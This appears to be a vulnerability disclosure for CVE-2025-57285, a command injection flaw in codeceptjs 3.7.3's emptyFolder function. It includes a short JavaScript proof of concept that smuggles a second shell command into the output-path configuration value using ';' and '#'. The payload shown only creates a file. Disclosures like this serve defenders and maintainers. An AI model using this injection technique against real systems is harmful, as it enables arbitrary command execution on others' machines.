
@Dremig
Created September 5, 2025 16:51
[CVE ID]
CVE-2025-57285
[PRODUCT]
codeceptjs 3.7.3
[VERSION]
codeceptjs 3.7.3
[DESCRIPTION]
codeceptjs 3.7.3 contains a command injection vulnerability in the emptyFolder function (lib/utils.js). The function builds a shell command for execSync by directly concatenating the caller-controlled directoryPath parameter, without sanitization or escaping, so shell metacharacters in the path (such as `;` and `#`) are interpreted by the shell. An attacker who controls the output path in the CodeceptJS configuration, with emptyOutputFolder enabled, can therefore execute arbitrary commands.
[PROBLEM TYPE]
Command Injection
[ATTACK VECTOR]
The following PoC code will create two files named "test" and "Dremig486" in the current folder. The `;` in the output path terminates the intended command, `touch Dremig486` is then executed as a separate command, and the trailing `#` comments out whatever the original command string appended after the path.
```javascript
var exp = require('codeceptjs');
// Attacker-controlled configuration: the output path carries shell
// metacharacters, and emptyOutputFolder makes CodeceptJS hand it to
// emptyFolder(), which passes it to execSync unescaped.
var maliciousConfig = {
  output: "/test/ ; touch Dremig486; #",
  emptyOutputFolder: true
};
var codecept = new exp.Codecept(maliciousConfig);
// init() performs the output-folder cleanup; the injected touch runs here.
codecept.init("/tmp");
```
[DISCOVERER]
Dremig
[REFERENCE]
https://www.npmjs.com